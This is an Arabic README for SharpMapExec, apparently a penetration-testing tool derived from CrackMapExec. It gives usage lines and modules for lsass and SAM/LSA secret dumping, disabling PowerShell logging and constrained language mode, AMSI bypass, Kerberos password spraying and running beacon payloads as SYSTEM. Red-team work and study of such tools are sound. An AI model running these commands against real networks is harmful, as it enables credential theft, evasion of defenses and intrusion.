
أداة اختبار اختراق شاملة خاصة بنظام ويندوز للحركة الجانبية، والوصول إلى بيانات الاعتماد، واستخراج البيانات، وفحص الثغرات عبر بروتوكولات CIM و SMB و WinRM و LDAP والمجال مع مصادقة Kerberos/NTLM.
نسخة محسنة من CrackMapExec. تم تصميم هذه الأداة لتبسيط اختبار الاختراق للشبكات وإنشاء أداة متعددة الاستخدامات تعمل على ويندوز، وهو مطلب شائع خلال محاكاة التهديدات الداخلية.
بالإضافة إلى مسح الوصول، يمكن استخدامها لتحديد التكوينات الضعيفة وتسريب البيانات. فكرة وحدات تسريب البيانات هي تنفيذ أقل قدر ممكن من الكود الضروري على الكمبيوتر البعيد. لتحقيق ذلك، ستقوم الأداة بتنزيل جميع الأسرار إلى دليل loot وتحليلها محليًا.
يمكنك تحديد ما إذا كنت تريد استخدام مصادقة Kerberos أو NTLM. إذا اخترت Kerberos، ستقوم الأداة بإنشاء رمز ضحي واستخدام Rubeus لاستيراد/طلب التذكرة. إذا تم تحديد NTLM، ستستخدم الأداة SharpKatz SetThreadToken أو انتحال هوية LogonUser.
SharpMapExec.exe
usage:
--- Cim ---
Need plaintext password or the /impersonate flag
SharpMapExec.exe ntlm cim /user:USER /password:PASSWORD /computername:TARGET
Available Cim modules
/m:enable_winrm (Runs Enable-PSRemoting -Force)
/m:disable_winrm (Runs Disable-PSRemoting -Force)
/m:disable_pslockdown (Modify __PSLockdownPolicy registry to disable CLM)
/m:disable_pslogging (Modify registry to disable PowerShell Logging)
/m:check_pslockdown (Check __PSLockdownPolicy registry)
/m:check_pslogging (Check PowerShell Logging registry)
--- Reg32 ---
SharpMapExec.exe ntlm reg32 /user:USER /ntlm:HASH /computername:TARGET
SharpMapExec.exe kerberos reg32 </user:USER /password:PASSWORD /domain:DOMAIN /dc:DC | /ticket:TICKET.Kirbi> /computername:TARGET
Reg32 modules
/m:disable_pslockdown (Modify __PSLockdownPolicy registry to disable CLM)
/m:check_pslockdown (Check __PSLockdownPolicy registry)
/m:check_pslogging (Check PowerShell Logging registry)
--- Smb ---
SharpMapExec.exe ntlm smb /user:USER /ntlm:HASH /domain:DOMAIN /computername:TARGET
SharpMapExec.exe kerberos smb </user:USER /password:PASSWORD /domain:DOMAIN /dc:DC | /ticket:TICKET.Kirbi> /computername:TARGET
Smb modules
/m:shares (Scan for accessible Smb shares)
--- WinRm ---
SharpMapExec.exe ntlm winrm /user:USER /password:PASSWORD /domain:DOMAIN /computername:TARGET
SharpMapExec.exe kerberos winrm </user:USER /rc4:HASH /domain:DOMAIN /dc:DC | /ticket:TICKET.Kirbi> /computername:TARGET
WinRm modules
/m:exec /a:whoami (Invoke-Command)
/m:exec /a:C:\beacon.exe /system (Invoke-Command as System)
/m:comsvcs (Dump & parse lsass)
/m:secrets (Dump and Parse Sam, Lsa, and System Dpapi blobs)
/m:assembly /p:Rubeus.exe /a:dump (Execute local C# assembly in memory)
/m:assembly /p:beacon.exe /system (Execute local C# assembly as System in memory)
/m:assembly /p:getMailBox.exe /delegwalk (Execute local C# assembly in all unique delegation processes in memory)
/m:download /path:C:\file /destination:file (Download file from host)
/m:upload /path:C:\file /destination:file (Upload file to host)
--- Domain ---
SharpMapExec.exe kerbspray /users:USERS.TXT /passwords:PASSWORDS.TXT /domain:DOMAIN /dc:DC
SharpMapExec.exe tgtdeleg
--- Ldap ---
SharpMapExec.exe ntlm domain /user:USER /password:PASSWORD /domain:DOMAIN /dc:DC /m:MODULE
SharpMapExec.exe kerberos ldap </user:USER /password:PASSWORD /domain:DOMAIN /dc:DC /m:MODULE | /ticket:TICKET.Kirbi>
Ldap modules
/m:spraydata (Download user and password policy)
يمكن استخدامه لمسح الوصول الإداري، ومشاركات SMB القابلة للوصول، وإصدار SMB وتوقيع الترحيل.
/m:shares (Scan enumerated shares for access)
الوحش. يحتوي على آلية تجاوز Amsi مدمجة، واختراق لغة JEA، وتحليل وظائف JEA. يمكن استخدامه لتنفيذ الأوامر، ومسح الوصول PsRemote، ونقاط JEA الضعيفة، وتسريب البيانات.
/m:exec /a:whoami (Invoke-Command)
/m:exec /a:C:\beacon.exe /system (Invoke-Command as System)
/m:comsvcs (Dump Lsass Process)
/m:secrets (Dump and Parse Sam, Lsa, and System Dpapi blobs)
/m:assembly /p:Rubeus.exe /a:dump (Execute Local C# Assembly in memory)
/m:assembly /p:beacon.exe /system (Execute Local C# Assembly as System in memory)
/m:download /path:C:\file /destination:file (Download File from Host)
يدعم حالياً رش كلمات مرور المجال وإنشاء TGT للمستخدم الحالي يمكن استخدامها مع معامل /ticket للحصول على السياق الحالي.
تنزيل البيانات اللازمة قبل رش كلمات المرور
/m:spraydata (Download user and password policy)
للتنفيذ السهل أو الجماعي في الذاكرة لتجميعات C#

رش كلمات مرور Kerberos ثم مسح الوصول الإداري المحلي

يدعم هذا المشروع مسح نقاط JEA وتحليل كود المصدر للأوامر غير الافتراضية والتحقق مما إذا كانت نقطة النهاية لم يتم تكوينها لوضع no-language.

اكتشاف إعادة استخدام كلمة مرور المسؤول المحلي باستخدام تجزئة NT.

تفريغ جماعي لعملية Lsass باستخدام DLL موقعة من مايكروسوفت مدمجة وحفظها في مجلد loot

ينفذ في جميع عمليات التفويض مرتبة حسب المستخدمين الفريدين

مسح توقيع SMB و SMBv1

والمزيد!
بعض السيناريوهات مع Kerberos تتطلب مزامنة ساعتك مع DC وتعيين DNS
net time \\DC01.hackit.local /set
Get-NetAdapter ethernet0* | Set-DnsClientServerAddress -ServerAddresses @('192.168.1.10')
المشاريع التي ساعدت أو موجودة في هذه الأداة